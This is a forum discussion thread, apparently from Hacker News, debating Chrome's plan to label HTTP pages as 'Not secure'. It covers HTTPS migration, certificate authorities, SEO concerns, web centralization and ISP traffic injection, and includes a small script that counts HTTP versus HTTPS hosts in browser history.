Cloudflare has a new feature wherein they can use HTTPS Everywhere's translation list to rewrite http references to use https where possible. It's almost certainly not perfect, but for many people it should at least reduce the amount of effort required. It's explicitly intended for the deep-within-your-codebase/CMS case you mention.
My understanding is that you'd need to be sitting between me and that webserver somewhere. If my ISP injects something into that page that changes it so that it no longer shows a dumb travel story from 15 years ago, I think the proper solution would be to change ISPs.
If one strongly held that position, one could make a killing selling fixed-price contracts to audit and fix all SSL issues for any website running on any stack, regardless of age.
$1,000, fixed price, guaranteed no Google Chrome warnings or your money back.
Personally, that would not be a business I'd take on. Would you? If so, I (and a lot of other people) have some consulting work for you.
"To continue to promote the use of HTTPS and properly convey the risks to users, Firefox will eventually display the struck-through lock icon for all pages that don’t use HTTPS, to make clear that they are not secure." [1]
My guess is that it was just a way to keep the message simple and not have too many numbers to distract the reader. The numbers for each pairing were probably conveniently close together, so combining them cut out two bullet points from an already very short blog post.
I predict "Not secure" will lose meaning for many people. There's just too many non-https websites. Traffic is not a relevant metric for this. Tell me how many of the websites that a user visits are http.
That matches my personal numbers for page views too, but TLS is site specific and not page specific, and it is deployed on small minority of websites on the internet (20-25% of top 1mil.), so my point still holds.
I may spend 80% of my time (whatever that means) on a few HTTPS websites, but I also spend 20% of my time browsing much larger proportion of non-https websites.
So the warning will be popping out a lot and will soon become a thing to ignore.
It’d be better to only include non-HTTPS entries when an HTTPS entry doesn’t also exist:
$ sqlite3 places.sqlite 'select url from moz_places' | python3 -c '
import sys, urllib.parse
v = [urllib.parse.urlparse(l) for l in sys.stdin]
secure = {u.hostname for u in v if u.scheme == "https"}
insecure = {u.hostname for u in v if u.scheme == "http"}
print(len(insecure - secure), len(secure))'
430 1124
Even this will miss places you haven’t visited in a while that have since added security, though.
It's very simple: with HTTP, ISPs can see your traffic and direct target ads to you. If everything is under HTTPS, they will need to resort to Google for ads since almost everyone uses Google Search Engine and it's products.
Eventually they’ll remove or downplay the secure label if the site doesn’t support modern TLS standards.
There’s no reason for users to trust a site when they see a secure icon, when the web goes secure by default, we’ll start to see this icon gradually disappear, reducing its importance. Secure TLS will need to be the default and it should be recognized in the browser that the transmission is secure but the site and its contents shouldn’t necessarily be trusted. Until and unless other trust standards are developed and promoted this way — like secure DNS — I see no reason why web browsers should highlight secure web pages. If anything they should indicate if people are about to use a new site, vs loading a commonly visited site to warn you about phishing attempts. They could also protect your privacy for you. But I think site identity validation and secure data transport should be independent concepts in browser UI.
* HTTPS w/ Let's Encrypt (No compliants, but no true secure lock.)
* HTTPS w/ a paid certificate (True magical green box)
In fact I think this should apply to all browsers. This might not deal with all of the issues, but it would be a good start. Feel free to point out where I'm wrong.
Let's Encrypt isn't the problem here. Expecting all CAs to properly verify what is and isn't a phishing website is unreasonable IMO. It just won't happen. Smaller CAs have hundreds of thousands of certs... it's just not possible.
The real issue is that a cert only says "Your communication between this site is encrypted, and you're speaking to the owner of this certificate" (Assuming it hadn't been compromised.) Certs don't make any guarantee that the person you are talking to is a good guy, nor that they aren't trying to trick you into giving your password to them.
Will the extra magic of the green box make users more secure? Does paying for a certificate make the certificate more trustworthy?
These are actually serious questions that I think the CA/Browser Forum are discussing (particularly in terms of the issuing requirements and UI representation for EV certificates), but I think it often boils down to the "feeling" of security, relying on the supposition that criminals would be less successful if their site didn't have the magical green box, or that they would be easier to catch by tracing the credit card payment they used to buy their certificate.
It occurs to me that Google has some incentive to do this. Ad blocking is much more difficult with https and requires an ordinary user inject a certificate of dubious origin/security.
> Ad blocking is much more difficult with https and requires an ordinary user inject a certificate of dubious origin/security.
What do you mean? I can see how this might apply if you're trying to MITM your https requests and ad block them that way, but a browser (or its plugin) can simply choose not to display an element on the page without doing that.. right?
Okay, because everyone just downvotes this without reason
Notice the massive downvoting of other, otherwise reasonable, comments here too --- that is because any discussion around security seems to trigger a primitive instinct of fear, the very thing that corporations and governments have learned to harness and exploit to their advantage.
It is really the same as the terrorism and "think of the children" arguments, and just as hard to have reasonable discussion or even opposition to.
Some people don't run adblockers on their client, they do it at centralized location, like with pihole to block at the DNS level. https can impact pihole. See this...
> Since Pi-hole only knows about the domain being requested and not the protocols being used to access it, Pi-hole will intercept HTTPS advertisements and since the Pi-hole does not have the certificate of the actual server being queried, you may see slow loading times waiting for the request to time out.
Now that we're done conflating encryption with certificates and cheapened the meaning of certificate trust, what are we going to use to establish which entity actually controls the domain name we are pointed to?
Generally I hate these warnings because they are extremely stubborn while not really telling the user what could fix the problem. They also don’t explain why the error might show up today when everything was fine yesterday.
I’d much prefer a message like: “There is no way to verify that this site really is who it claims to be (possibly due to an expiration date, as sites must periodically renew their validations). The owner of the real site can resolve this error by using certification services such as LetsEncrypt. A secure connection is not possible until the site renews its validation.”.
The user in this case is a random web browser piloted by a non-technical person. It doesn't make any sense to try to arm them with technical solutions to the problem; that's the site owner's job.
What I find really interesting is the website in question, oilandgasinternational.com, now has SSL on by default now; it'll redirect you from any page if accessed over HTTP. Given that, perhaps we should just let them complain? It seems to raise awareness over the need for SSL.
Ironically, the thing stopping me moving my website to HTTPS is Google themselves!
There is no clear and unambiguous way to move my website from HTTP to HTTPS without GUARANTEEING that my search index rankings will not fall in the Google search index. This is because Google treat the HTTP and HTTPS versions of the same resource as separate pages.
Until they fix this, I'm sticking with HTTP. A drop in our search rankings would be a catastrophe.
I believe that sites that are served securely are ranked higher in Google search results, so you're actually ranked lower now than if you'd already gone through the process of securing your site.
Also, millions of sites have already secured themselves and survived just fine. I just don't know what you're worried about. Can you point to some links of this having been a problem for other websites?
I migrated a couple of my sites without any harm to rankings. Maybe a dip for a day while it all re-indexed. Best way to do it is to 301 to https it seems
Couldn't you have both, and wait till the https version starts to approach parity with the original? I'm imagining google would favor https over http in ranking, so over time it should rise
2 separate pages with the same content is penalised by Google. They are quite clear about that. I will switch on HTTPS tomorrow if Google make it so that a protocol change does not affect search indexing. My business depends on this. Do a Google search and see all the people whose websites have been demolished by dropping out of the Google rankings after implementing HTTPS. Absurd!
There are a few well documented methods to counter that penalty: https://support.google.com/webmasters/answer/139066?hl=en. The easiest method is probably to configure your webserver to start sending 'rel=canonical' in a Link HTTP header, but it can also be done with a meta-tag.
You should only ever have a single canonical version of your content. Serve your stuff on one path and one path only, and everything else redirects to it.
The solution here is to serve on https and redirect http to it.
Sorry if this is obvious, but have you set up Google Search Console for your domain? (aka Google webmaster tools) It helps with things like this. It has a "change of address" option.
Is there evidence that this is indeed the case? I've seen much FUD but no actual data that shows that a properly updated site (301 redirects, HSTS, robots.txt) is penalized.
In a way, that's already happening with wasm. I can't wait for a major language VM to be compiled to WASM and hosted on a common CDN (so it's likely to be cached). It's not such a pipe dream to imagine running high performance Python 3 or Java without the overhead of asm.js on the interpreter, but with the ease of running old fashioned JS.
This will reduce the diversity of information exchanged, as does ranking secure sites higher in search results. Privacy and security are worthy goals, but I do feel for those who are attempting to publish free information on personally run sites. The easiest thing to do is put Cloudflare in front of them which also has other benefits.
I have only ever made internal web apps that don't live on the internet. Where do I begin for an idiot's guide to switching to HTTPS? I want the shortest path to switching nginx over and getting an SSL cert. I think that's all I need to worry about?
Probably will be a very unpopular opinion, but while I appreciate that HTTPS encrypts traffic, I do think a mandatory HTTPS usage comes with a cost, not so much mentioned in this thread. Here's what I think:
I think the mandatory usage of HTTPS centralizes the already centralized web even further. HTTPS itself is secure theoretically, but at the same time it relies on:
1. Trust in browser vendors: Basically the way HTTPS works currently is that all browsers have "trusted certificate sources" hardcoded. And there aren't that many browsers out there with meaningful market share--Chrome, Firefox, Edge, Safari, and that's about it (One may even say it's pretty much Chrome all the way, with rest of them trailing far back)
2. Trust in the certificate authorities: The way HTTPS works relies on "trusted certificate sources", like verisign. This was already way too centralized, but it will become even more so. I'm guessing eventually companies like Google or Apple will start acting as generic certificate authorities (as a verisign competitor) unless regulators cut in.
If you think about the implication of all this, the more we move towards an "HTTPS first world", the more power these entities will have and the more damage it will cause when one of them gets compromised.
Note that the web has never been forced to use HTTPS throughout its entire history, so we have no idea how this will play out and I'm just speculating based on my knowledge. HTTPS itself is secure, but as a lot of you know, most dangerous hacks come not from exploiting tech flaws, but by exploiting the weakest link in the value chain--the human factor. And when things become this centralized, the "human factor risk" becomes larger and larger. We have never before had a world where HTTPS was forced, so it's not easy to just visualize this or predict what will happen, but I can imagine there can be many ways the "The entire web can go down one day" because of the extreme centralization, and when I say "the entire web" I mean it literally. One day, some hacker will take advantage of the extremely centralized landscape of the web and probably be able to compromise the ENTIRE web, and you won't be able to browse the web all day, until Apple, Mozilla, or Google releases a security update. This will be way worse than what we've experienced with S3 going down, because it will obsolete security measures of ALL web browsers in one fell swoop.
Another thing I don't like about this "forced HTTPS" is that mandatory HTTPS makes it difficult to publish stuff to the web. You must either deploy your own Letsencrypt to run your website, or if it's too much of a hassle (which would be the case for most people, even developers), just run your website on a service provider that already has HTTPS.
This means people will rather publish their blogs on sites like medium.com rather than running their own wordpress server, or even a ghost blog.
And when this happens, where do you think people will flock to? Most people will flock to platforms that are most stable and have high reputation, such as Google, Facebook, etc., which will centralize the web even further.
I may sound like a tin foil hat conspiracy theory guy but I just wanted to share my thought since everyone seems to think "You must be fucking crazy moron to think that there can be some drawbacks with a forced HTTPS future". Google does have every interest to move the web this direction because they already own the "centralized web", and the more centralized it becomes the more they benefit.
Just to reiterate, I do think HTTPS is great, and user privacy should be respected. I am just providing an alternative opinion.
> Another thing I don't like about this "forced HTTPS" is that mandatory HTTPS makes it difficult to publish stuff to the web. You must either deploy your own Letsencrypt to run your website, or if it's too much of a hassle (which would be the case for most people, even developers), just run your website on a service provider that already has HTTPS.
> This means people will rather publish their blogs on sites like medium.com rather than running their own wordpress server, or even a ghost blog.
I think we'll just see an evolution of the tools available. For example, Ghost's CLI install already sets up letsencrypt for you along with auto-renew of certificates, anyone using that or the 1-click DigitalOcean droplet will get HTTPS with no extra setup difficulty compared to a non-HTTPS version.
> You trust browser vendors pretty hard already since you're routing ALL of your information through them.
Yes, but just because we already do doesn't mean I shouldn't have rights to hate the reality even more.
> I don't buy it. HTTPS reduces what you can do, not increase it. At most it can give a false sense of security but that's about it.
That's true. I wasn't arguing about what HTTPS can or cannot do, I was arguing about how HTTPS is centralized. No matter how safe a piece of technology is, the attack vector increases the more it gets centralized. I've never been a fan of the reality we live in--where the core protocol is elegantly decentralized yet we still end up with a centralized trust to be safe.
I think it's ridiculous that every existing website in the world needs to have a certificate authorized by a small number of entities.
Also another point I'm making is that people look at this move by Google and think "wow Google is really advancing the web!" but don't see their motivation behind it.
1. Google owns the "open web".
2. Enforcing HTTPS will make sure things become more centralized, which will make it easier for google to keep controlling the "open web".
3. Google profits.
I know this sounds like a conspiracy theory, but I'm just stating the facts. I can't think of any other scenario when HTTPS gets more and more traction. It's important to distinguish this problem from the actual problem HTTPS is solving, because I do think HTTPS itself is great.
I can see GoDaddy now rubbing their hands with glee as they ponder the prospect of selling overpriced server certificates to unaware website owners. No way they'll push a Let's Encrypt solution.
This. I already have clients purchasing SSL certificates from GoDaddy due to their aggressive FUD-marketing. To make matters even worse, GD does not in any way assist in the installation, or "activated" of the SSL cert.
I just checked GoDaddy's prices, out of curiosity. "Plans starting at $59.99/yr".
For comparison, you can get a Comodo PositiveSSL cert for about $10/yr.
What is the modern simple and cheap way to set up a static HTTPS site with a custom domain? With HTTP this was doable with S3 for pennies a month; is S3+CloudFlare now the current price leader?
Replying to myself. It's distressing how many of the options assume command line competence.
It used to be that graphic designers, photographers, families, etc. could set up a simple site with a shared host, an FTP client, and a bit of HTML. Now requiring HTTPS will push this further out of reach.
This content is now funneled into either managed platforms, either free ones that monetize it (Medium, Flickr, Facebook, etc.) or more expensive higher-touch services (SquareSpace, Wix, etc). The de-democratization of the web continues.
Whatever company offering you FTP access and hosting those files for you over HTTP should be setting up HTTPS for you automatically without any extra input from you. That’s why all the instructions assume command-line competence: designers are not the target audience; sys-admins are.
If your host hasn’t caught up with the times yet it’s very straight-forward to get this for free (along with other benefits) from cloudflare with a few clicks.
Generally agree with you... however, I’m a designer and I’ve had surprisingly positive experiences with AWS. I thought it was going to be highly technical and frustrating, but for basic static hosting AWS doesn’t require any command line skills. It’s all point and click. You can even set up SFTP to your S3 bucket with something like Transmit from Panic (Mac). More of what you’ll find yourself dealing with is AWS’s confusing UX, understanding how all the AWS parts fit together (Route 53, CloudFront, etc,) and discoverability in their help documentation.
For a static site on AWS, you can easily set up S3 + CloudFront + Route 53 + free certificate from AWS Certificate Manager. My bill is around $1.07 per month.
Yes: the browser is not in control of resolving "localhost" to 127.0.0.1, nor is it in control of resolving 127.0.0.1 to the loopback interface. These are details the OS is in charge of, not the browser. So the browser can't know that http://localhost/ is "secure".
Looks like defamation to me. Just because a website doesn't have https doesn't mean it not secure. It's not secure for some activities, and if the browser marks the whole page as not secure, it's defamation.
I don't care if the web would be better with all site having https. Chrome is saying something defamatory about websites without https.
This is going to be interesting. I believe instead of pushing everyone to use https this will cause an average user to start ignoring the security warning. I see the security warning as a way to reflect what's insecure and not a catalyst to move to more secure methods.
Maybe Android Chrome could be worked on to not poop the bed quite so thoroughly when faced with a captive portal, then, if they're trying to get everybody onto https. Because the interaction between https, Android, and captive portals is just not a good scene.
As long as it doesn't break local development again like their forcing of https on *.dev even when locally hostfiled. Funny enough they suggest using .test which is fine, except you cant use .test as a callback url when setting up googles oauth... fail!
Right. HTTP/2 is only available with TLS, due to browser policies, so it necessarily requires TLS.
This means you need HTTPS if you want the performance wins of HTTP/2.
This doesn't mean that HTTPS is a performance win if you're still using HTTP/1.1. However, the "performance overhead" for TLS is negligible in practice.
Yes, so there are two major changes you'd need to get this performance benefit, not one, and if you just make the TLS change, your performance will (probably marginally) suffer, not improve. It's a bogus comparison.
Since the other examples don't appear to have convinced you, how about this one: https://samy.pl/poisontap/
Visit a single HTTP page while that's plugged in and it'll trigger an exploit that siphons all non-secure-flagged cookies off of every popular site that doesn't use HSTS (including the config pages of insecure routers on your LAN), and installs a persistent backdoor in them so the attacker can continue accessing data on those sites even after you're no longer being MITM'd. And that's not even using any zero-days; it's just exploiting the inherent vulnerabilities in non-secure HTTP.
(Note that while the site I linked talks about a USB device the same attack can be carried out by any MITM, like a WiFi router or upstream ISP; it's not exclusive to local attackers.)
Yeah, the DHCP trick is what allows this particular method of conducting MITM via USB.
All the stuff it does _after_ becoming a MITM though are things that any MITM could do, regardless of how they became a MITM in the first place. (ARP spoofing, operating or compromising a Wi-Fi access point, etc.)
An example from the real world -- Comcast, a large ISP in the USA, has been caught injecting JavaScript into websites: https://thenextweb.com/insights/2017/12/11/comcast-continues... It's not hard to imagine a more malicious use, like tracking or injecting adverts the ISP wants you to see on webpages.
This is only possible because the connection isn't encrypted.
Another example -- Verizon were injecting a header called X-UIDH which had a unique identifier, acting as a super-cookie that was present on all websites and couldn't be removed: https://www.eff.org/deeplinks/2014/11/verizon-x-uidh
This is only possible because the connection isn't encrypted.
All of that is bad, none of it is a security issue. Privacy, sure. But not security. And the article specifically shows that Google is planning to mark example.org as insecure. Which it's not.
insecure (adj.)
(of a thing) not firm or fixed; liable to give way or break.
not sufficiently protected; easily broken into.
A webpage loaded over HTTP is easy to tamper with. Let me give you an example of traffic over HTTP that is secure -- apt repositories; because you're only retrieving payloads protected by PGP, so the actual payload is firm, fixed, and not easily broken into.
How else do you define insecure? Have I misunderstood the definition?
Insecure can't be used as a drop-in replacement for compromised though; Being insecure will get you compromised. One distinct thing might lead to another distinct thing
Your argument seems to be that because there are multiple ways to exploit people that closing any of those methods is not useful. I shouldn't have to explain why this is not a meaningful argument.
What I will say is that in many cases an attacker is far more capable of MITM than they are of posting forum comments, or otherwise convincing you to click a link. A phishing campaign is noisy - you are often alerting many parties that you're malicious. MITM within a network is much stealthier and you don't have to rely on users clicking on anything.
Really, they're just completely different attacks and the existence of one has no bearing on the other. TLS on every page would close off real attacks and, if it forced attackers to use noisy methods like phishing, that's a huge win.
Your assumption is that visiting example.com gets the benign content from example.com, but without security ANY http connection can be made to serve nasty malware.
I'm generally not worried about HTTP connections. Any random hyperlink I click on can produce those. However Ajedi32 made some very good points that being able to MITM HTTP connections can cause lasting issues, even for pages where the user is not intending to download anything, nor enter credentials.
Maybe someone could answer this for me, this discussion made me curious:
I have an old (2005) Mac, and my fav browser on it can't show https sites at all 90%+ of the time - "Cannot Load, Secure Connection Failed". (like the usual https sites linked to in HN stories) But it works fine with some https sites, e.g. github https, youtube, this page.
What is it about those 'working' https sites that makes them different? Hopefully that's enough info to answer that.
Ohh thanks guys. Yeah, I had a vague feeling my SSL (whatever that is) was outdated. So those sites just are more backwards-compatible. (Although github isn't backwards-compatible enough to actually make an account. I tried.)
I hate this. I too do a lot of off-line, never connected to the Internet devices and I don't want the god Google telling my users they're "not secure". My users know they're on a self contained network.
What are the best services out there today to translate a website from HTTP to HTTPS? Particularly for a static website. I have previously used Cloudfare's One-Click SSL free service, and I wasn't a big fan.
What about simple static sites like blogs that dont have forms? Do we really need to scare people away from our blogs and do we have to get an SSL cert for them unecessarily?
This has already been answered many times in this thread. Static sites are still vulnerable to MITM attacks and snooping over the network. Using HTTPS prevents this.
This is a really stupid move. There are plenty of instances where websites do not need to use HTTPS, like simple static websites for small businesses that do not collect personal user information. This is going to cause a lot of confusion and outrage when it is implemented.
This centralizes publishing rights to browser vendors & security cert vendors. I don't want to take permission from any third-party before publishing content on the web.
In any case, its rather rude of you to presume to know what people should think about this topic.
What login page? Your typical company website just has a few pages of text without any active elements. Forcing those to buy SSL certificates creates just another artificial barrier to entry.
So suddenly people will see lots of websites as insecure. This way they will stop paying attention to this warning, and when they will find a really insecure website, they will just use it.
There is. Firefox quantum is better than Chrome. The only thing is pushbullet doesn't quite show popus correctly. It works with all the major streaming services, and just feels better. Now if only client side window decoration would come sooner, I want to ridded of that ugly title bar. I miss fedora's firefox 57 build.
Unfortunately, the html inspector in quantum is not as good as it used to be. I don't know why but it often refuses to find the correct element. I use Firefox as my main browser since quantum but for development I have to use Chrome or else I'd go mad.
I'm sure they're going to fix that soon, but until that happens it's very frustrating. For example, if the site is loading there is no way to inspect the elements that are already loaded.
HTTPS helps secure traffic between two parties, but that has nothing to do with whether that end party (ahem, Google, or Equifax, ahem) is secure.
If we want real security we need to put cryptographic keys in P2P identities, so users control end-to-end everything they do. No middleman can tamper with it.
I believe most people are seeing this wrong, there a few issues here.
1) Google is defining standards
This isn’t a drive for web masters and users, it’s our brother Google telling us what’s good and what is bad. While they often fail on their own standards. But hey, they can’t fail to pass, but you cant.. no expections besides big G.
2) We’re focusing on SSL
This isn’t about SSL, but’s about point one.
3) misleading
Reading some basic website that is just a random one page html site, doesn’t care about it at all. This gives basic users( the ones we’re thinking are too dumb to demand ssl) the idea this site is not safe.
Real users think two things;
Safe or not safe.. they don’t understand the gray and now we’re saying Not Secure. A lot of people will think this is not safe, no one is around telling them why this appears as no one in the real world reads this blog besides us.
That presumes that the ONLY goal of HTTPS is to hide the information transferred. However, you have to recognize the fact that you run JITed code from these sites. And we have active examples of third parties (ISPs, WiFi providers) inject code into your web traffic. When browsing the web with HTTP you are downloading remote code, JITing it, and running it on every site you visit if you aren’t 100% noscript with no HTTP exceptions. You have no way of knowing where that code actually came from.
Now consider that things like Meltdown and Spectre have JavaScript PoCs. How is this controversial?